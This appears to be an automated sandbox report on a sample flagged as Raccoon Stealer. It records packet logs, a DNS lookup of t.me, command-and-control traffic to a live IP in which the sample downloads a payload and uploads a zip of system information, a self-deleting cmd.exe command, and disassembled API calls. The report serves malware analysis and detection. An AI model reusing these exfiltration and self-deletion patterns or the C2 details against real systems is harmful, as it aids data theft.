                                                                                                  Sep 27, 2021 20:31:45.359668970 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.359709978 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.359752893 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.359798908 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.360559940 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.360582113 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.360608101 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.360630989 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.360641003 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.360656023 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.360683918 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.362776995 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.386713982 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.386774063 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.386801004 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.386821032 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.386843920 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.386863947 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.386904001 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.386933088 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.386954069 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.386974096 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.386992931 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.387013912 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.387032986 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.387051105 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.387070894 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.387833118 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.390607119 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.390655994 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.394135952 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.408664942 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.408708096 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.408756018 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.408776045 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.408796072 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.408830881 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.408833027 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.408874035 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.408895969 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.408906937 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.408934116 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.408960104 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.408961058 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.408986092 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.409051895 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.409079075 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.409102917 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.409104109 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.409128904 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.409152985 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.409152985 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.409202099 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.409296036 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.409322977 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.409373045 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.409492970 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.409521103 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.409544945 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.409569025 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.409570932 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.409595966 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.409621000 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.409646034 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.409689903 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.409699917 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.409729958 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.409780979 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.409811974 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.409854889 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.409905910 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.410403967 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.410437107 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.410511017 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.411578894 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.411616087 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.411640882 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.411667109 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.411694050 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.411720037 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.411722898 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.411756992 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.411777020 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.411792994 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.411818027 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.411842108 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.411870003 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.411900043 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.411950111 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.413696051 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.438482046 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.438524961 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.438549995 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.438575029 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.438601017 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.438621044 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.438627005 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.438652039 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.438676119 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.438724995 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.438761950 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.438786030 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.438842058 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.438863039 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.438893080 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.438918114 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.438941002 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.438944101 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.438990116 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.446329117 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.446372986 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.447187901 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.447216988 CEST8049755194.180.174.100192.168.2.5

                                                                                                  UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP

                                                                                                  DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Sep 27, 2021 20:31:39.047183990 CEST | 192.168.2.5 | 8.8.8.8 | 0xf4a7 | Standard query (0) | t.me | A (IP address) | IN (0x0001)

                                                                                                  DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Sep 27, 2021 20:31:39.059566975 CEST | 8.8.8.8 | 192.168.2.5 | 0xf4a7 | No error (0) | t.me |  | 149.154.167.99 | A (IP address) | IN (0x0001)

                                                                                                  HTTP Request Dependency Graph

                                                                                                  • t.me
                                                                                                  • 194.180.174.100

                                                                                                  HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49742 | 149.154.167.99 | 443 | C:\Users\user\Desktop\31cGYywxgy.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49745 | 194.180.174.100 | 80 | C:\Users\user\Desktop\31cGYywxgy.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 20:31:39.696208000 CEST | 664 | OUT | POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/plain; charset=UTF-8
Content-Length: 128
Host: 194.180.174.100
Sep 27, 2021 20:31:39.696279049 CEST | 664 | OUT | Data Raw: 6f 32 78 74 51 66 33 41 51 48 4d 49 74 4c 32 4e 77 4f 74 46 70 4a 6c 77 57 70 61 47 45 4a 62 38 36 4e 35 53 36 52 62 44 5a 4c 46 2f 57 45 77 37 69 56 4a 33 61 6b 56 58 73 63 48 51 55 2f 54 32 74 2f 42 6f 75 35 34 67 56 79 2f 66 58 77 54 31 78 4d
Data Ascii: o2xtQf3AQHMItL2NwOtFpJlwWpaGEJb86N5S6RbDZLF/WEw7iVJ3akVXscHQU/T2t/Bou54gVy/fXwT1xMQ6oIV9g4OF5WpIMH4A+7pj7a1XPgNfHdjEXaWb0gbct84=
Sep 27, 2021 20:31:40.108971119 CEST | 1105 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 Sep 2021 18:31:40 GMT
Content-Type: text/plain;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Sep 27, 2021 20:31:40.119069099 CEST | 1110 | OUT | GET //l/f/G5GYJXwB3dP17Spz8m-L/d9a87544924531ef155dbccfe1a04e27038ca861 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 194.180.174.100


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.5 | 49755 | 194.180.174.100 | 80 | C:\Users\user\Desktop\31cGYywxgy.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 20:31:43.715740919 CEST | 1119 | OUT | GET //l/f/G5GYJXwB3dP17Spz8m-L/70e760d32c85dd68bb76b7cf4f9d65a400d87d16 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 194.180.174.100
Sep 27, 2021 20:31:43.977533102 CEST | 1120 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 Sep 2021 18:31:43 GMT
Content-Type: application/octet-stream
Content-Length: 2828315
Connection: keep-alive
Last-Modified: Wed, 01 Sep 2021 16:21:39 GMT
ETag: "612fa893-2b281b"
Accept-Ranges: bytes
                                                                                                  Sep 27, 2021 20:31:47.146648884 CEST4058OUTPOST / HTTP/1.1
                                                                                                  Cache-Control: no-cache
                                                                                                  Connection: Keep-Alive
                                                                                                  Pragma: no-cache
                                                                                                  Content-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cV
                                                                                                  Content-Length: 1017
                                                                                                  Host: 194.180.174.100
                                                                                                  Sep 27, 2021 20:31:47.146759033 CEST4059OUTData Raw: 28 1d 72 0d 0a 2d 2d 76 44 32 74 4c 31 71 43 39 62 43 33 7a 56 39 65 44 39 79 58 38 64 55 38 79 59 38 6c 43 31 63 56 0d 0a 63 6f 6e 74 65 6e 74 2d 64 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 47 35 47
                                                                                                  Data Ascii: (r--vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVcontent-disposition: form-data; name="G5GYJXwB3dP17Spz8m-L"; filename="G5GYJXwB3dP17Spz8m-L.zip"Content-Type: application/octet-streamPK ;S^>System Info.txtUT*Ra*Ra*Ra
                                                                                                  Sep 27, 2021 20:31:47.478635073 CEST | 4059 | IN | HTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Mon, 27 Sep 2021 18:31:47 GMT
                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: keep-alive
                                                                                                  Vary: Accept-Encoding
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Data Raw: 32 38 0d 0a 66 66 33 33 62 38 39 62 64 38 65 36 35 66 63 38 33 37 31 30 39 63 39 65 35 66 35 35 64 61 65 30 39 34 39 38 64 39 38 35 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 28ff33b89bd8e65fc837109c9e5f55dae09498d9850


                                                                                                  HTTPS Proxied Packets

                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                  0 | 192.168.2.5 | 49742 | 149.154.167.99 | 443 | C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                  2021-09-27 18:31:39 UTC | 0 | OUT | GET /agrybirdsgamerept HTTP/1.1
                                                                                                  Cache-Control: no-cache
                                                                                                  Connection: Keep-Alive
                                                                                                  Pragma: no-cache
                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                  Host: t.me
                                                                                                  2021-09-27 18:31:39 UTC | 0 | IN | HTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0
                                                                                                  Date: Mon, 27 Sep 2021 18:31:39 GMT
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Content-Length: 4597
                                                                                                  Connection: close
                                                                                                  Set-Cookie: stel_ssid=8f899ca2783178ab00_11525714243972296431; expires=Tue, 28 Sep 2021 18:31:39 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                  Pragma: no-cache
                                                                                                  Cache-control: no-store
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  Strict-Transport-Security: max-age=35768000
                                                                                                  2021-09-27 18:31:39 UTC0INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 61 67 72 79 62 69 72 64 73 67 61 6d 65 72 65 70 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 67 72 79 62 69 72 64 73 67 61 6d 65 72 65 70 74 22 3e 0a 3c 6d 65 74 61
                                                                                                  Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @agrybirdsgamerept</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta property="og:title" content="agrybirdsgamerept"><meta


                                                                                                  System Behavior

                                                                                                  General

                                                                                                  Start time: 20:31:31
                                                                                                  Start date: 27/09/2021
                                                                                                  Path: C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  Wow64 process (32bit): true
                                                                                                  Commandline: 'C:\Users\user\Desktop\31cGYywxgy.exe'
                                                                                                  Imagebase: 0x400000
                                                                                                  File size: 422400 bytes
                                                                                                  MD5 hash: 7739202A73E3F1C15F5F5E6F82434955
                                                                                                  Has elevated privileges: true
                                                                                                  Has administrator privileges: true
                                                                                                  Programmed in: C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000000.00000003.257211865.0000000002220000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000000.00000002.282454454.0000000002120000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  Reputation: low

                                                                                                  General

                                                                                                  Start time: 20:31:47
                                                                                                  Start date: 27/09/2021
                                                                                                  Path: C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit): true
                                                                                                  Commandline: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\31cGYywxgy.exe'
                                                                                                  Imagebase: 0x150000
                                                                                                  File size: 232960 bytes
                                                                                                  MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
                                                                                                  Has elevated privileges: true
                                                                                                  Has administrator privileges: true
                                                                                                  Programmed in: C, C++ or other language
                                                                                                  Reputation: high

                                                                                                  General

                                                                                                  Start time: 20:31:48
                                                                                                  Start date: 27/09/2021
                                                                                                  Path: C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit): false
                                                                                                  Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase: 0x7ff7ecfc0000
                                                                                                  File size: 625664 bytes
                                                                                                  MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges: true
                                                                                                  Has administrator privileges: true
                                                                                                  Programmed in: C, C++ or other language
                                                                                                  Reputation: high

                                                                                                  General

                                                                                                  Start time: 20:31:49
                                                                                                  Start date: 27/09/2021
                                                                                                  Path: C:\Windows\SysWOW64\timeout.exe
                                                                                                  Wow64 process (32bit): true
                                                                                                  Commandline: timeout /T 10 /NOBREAK
                                                                                                  Imagebase: 0x7ff797770000
                                                                                                  File size: 26112 bytes
                                                                                                  MD5 hash: 121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                                  Has elevated privileges: true
                                                                                                  Has administrator privileges: true
                                                                                                  Programmed in: C, C++ or other language
                                                                                                  Reputation: high

                                                                                                  Disassembly

                                                                                                  Code Analysis

                                                                                                    Executed Functions

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0042C388
                                                                                                    • CoInitialize.OLE32(00000000), ref: 0042C3A4
                                                                                                      • Part of subcall function 004360E7: OpenMutexA.KERNEL32 ref: 00436130
                                                                                                      • Part of subcall function 004360E7: CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 0043613D
                                                                                                    • CoUninitialize.OLE32(?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00432A17
                                                                                                      • Part of subcall function 00438DFD: GetCurrentProcess.KERNEL32(00000008,?,?,?), ref: 00438E0F
                                                                                                      • Part of subcall function 00438DFD: OpenProcessToken.ADVAPI32(00000000), ref: 00438E16
                                                                                                      • Part of subcall function 00438DFD: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00438E30
                                                                                                      • Part of subcall function 00438DFD: GetLastError.KERNEL32 ref: 00438E3A
                                                                                                      • Part of subcall function 00438DFD: GlobalAlloc.KERNEL32(00000040,00000000), ref: 00438E4A
                                                                                                      • Part of subcall function 00438DFD: GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 00438E5E
                                                                                                      • Part of subcall function 00438DFD: ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00438E72
                                                                                                      • Part of subcall function 00438DFD: GlobalFree.KERNEL32 ref: 00438E92
                                                                                                    • GetUserDefaultLCID.KERNEL32(00001001,?,000000FF), ref: 0042C3E8
                                                                                                    • GetLocaleInfoA.KERNEL32(00000000), ref: 0042C3EF
                                                                                                      • Part of subcall function 00438EA2: __EH_prolog.LIBCMT ref: 00438EA7
                                                                                                      • Part of subcall function 00438EA2: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00438F09
                                                                                                      • Part of subcall function 00438EA2: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00438F23
                                                                                                      • Part of subcall function 00438EA2: OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,00000000), ref: 00438F97
                                                                                                      • Part of subcall function 00438EA2: OpenProcessToken.ADVAPI32(00000000,000F01FF,?,?,?,00000000), ref: 00438FA9
                                                                                                      • Part of subcall function 00438EA2: DuplicateTokenEx.ADVAPI32(?,000F01FF,00000000,00000002,00000001,?,?,?,00000000), ref: 00438FC4
                                                                                                      • Part of subcall function 00438EA2: CloseHandle.KERNEL32(?,?,?,00000000), ref: 00438FD1
                                                                                                      • Part of subcall function 00438EA2: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 00438FE4
                                                                                                      • Part of subcall function 00414F98: __EH_prolog.LIBCMT ref: 00414F9D
                                                                                                    • Sleep.KERNEL32(00001388,00489110,00000000,0047935B), ref: 0042C988
                                                                                                      • Part of subcall function 004358BF: __EH_prolog.LIBCMT ref: 004358C4
                                                                                                    • GetUserNameA.ADVAPI32(?,00000101), ref: 0042CB6C
                                                                                                      • Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
                                                                                                      • Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C
                                                                                                    • Sleep.KERNEL32(00007530), ref: 0042CD2A
                                                                                                      • Part of subcall function 00423759: __EH_prolog.LIBCMT ref: 0042375E
                                                                                                    • _strlen.LIBCMT ref: 0042CE4B
                                                                                                    • _strlen.LIBCMT ref: 0042CE65
                                                                                                    • CreateThread.KERNEL32 ref: 0042D0AF
                                                                                                    • CreateThread.KERNEL32 ref: 0042D0C1
                                                                                                    • StrToIntA.SHLWAPI(00000000,00000000,00489798), ref: 0042D203
                                                                                                      • Part of subcall function 00435C6D: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000001), ref: 00435CB7
                                                                                                      • Part of subcall function 004344AA: __EH_prolog.LIBCMT ref: 004344AF
                                                                                                      • Part of subcall function 004344AA: WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,00488780,0000000F,00000001), ref: 004344ED
                                                                                                      • Part of subcall function 004344AA: CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00434511
                                                                                                      • Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C
                                                                                                      • Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64
                                                                                                    • CreateThread.KERNEL32 ref: 0042D524
                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0042D52D
                                                                                                    • CreateThread.KERNEL32 ref: 0042D0D3
                                                                                                      • Part of subcall function 00432C77: __EH_prolog.LIBCMT ref: 00432C7C
                                                                                                      • Part of subcall function 004296D2: __EH_prolog.LIBCMT ref: 004296D7
                                                                                                      • Part of subcall function 00438CD8: __EH_prolog.LIBCMT ref: 00438CDD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$Create$OpenToken$ProcessThread$DeallocateFileGlobalInformationMutexNameSleepUser_strlen$AllocCloseConvertCurrentDefaultDuplicateEnvironmentErrorFirstFreeHandleHttpInfoInitializeLastLocaleModuleObjectProcess32SingleSnapshotStringToolhelp32UninitializeVariableWait_strcat
                                                                                                    • String ID: $&$($,$/$0$2$25ef3d2ceb7c85368a843a6d0ff8291d $4$5$7$9DdPQajmZndZ4qCLnM5Gu8kEArObEJr9kpZfshjMFLdbDkIa0SdMPw== $:$<$<$=$C$C$G$GET$H$N$O$POST$Q$Q$S$V$W$[$\$_$_id$b$f$h$p$qSVdAbi/K2pPr/3e18wU+9RXCqXPWsSoxpYUtF+O $r$s$s$v${$}$~
                                                                                                    • API String ID: 376243089-3970548752
                                                                                                    • Opcode ID: da2981c851184b2fa7643d0d1ca98076d3d836111e0a2cb6e59a3499d969c3d3
                                                                                                    • Instruction ID: 4fe60910e1ec4b79d226cabb142ab88437985495ab14f2297e82cd6290d5d1cb
                                                                                                    • Opcode Fuzzy Hash: da2981c851184b2fa7643d0d1ca98076d3d836111e0a2cb6e59a3499d969c3d3
                                                                                                    • Instruction Fuzzy Hash: DED39F34D052A89ADF25E765DC51BEDBBB46F25308F0004DEA54973293DE782B88CF29
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0043781E
                                                                                                      • Part of subcall function 004373C6: __EH_prolog.LIBCMT ref: 004373CB
                                                                                                      • Part of subcall function 004373C6: RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119,?,?,?), ref: 0043746F
                                                                                                      • Part of subcall function 004373C6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,?,?,?), ref: 004374BD
                                                                                                      • Part of subcall function 004373C6: RegCloseKey.ADVAPI32(?,?,?), ref: 004374C6
                                                                                                    • _strftime.LIBCMT ref: 0043794F
                                                                                                    • GetUserDefaultLCID.KERNEL32(00001001,?,00000100,?,?,?,?,?), ref: 00437978
                                                                                                    • GetLocaleInfoA.KERNEL32(00000000), ref: 0043797F
                                                                                                    • GetUserNameA.ADVAPI32(?,?), ref: 00437BD0
                                                                                                    • GetComputerNameA.KERNEL32(?,00000101), ref: 00438275
                                                                                                    • GetUserNameA.ADVAPI32(00000001,00000101), ref: 004382EF
                                                                                                    • GetSystemInfo.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,00000000,00000012,00000040,00000001), ref: 0043861D
                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?,?,?,00000000,00000012,00000040,00000001), ref: 00438707
                                                                                                    • GetSystemMetrics.USER32 ref: 0043888C
                                                                                                      • Part of subcall function 00439503: __EH_prolog.LIBCMT ref: 00439508
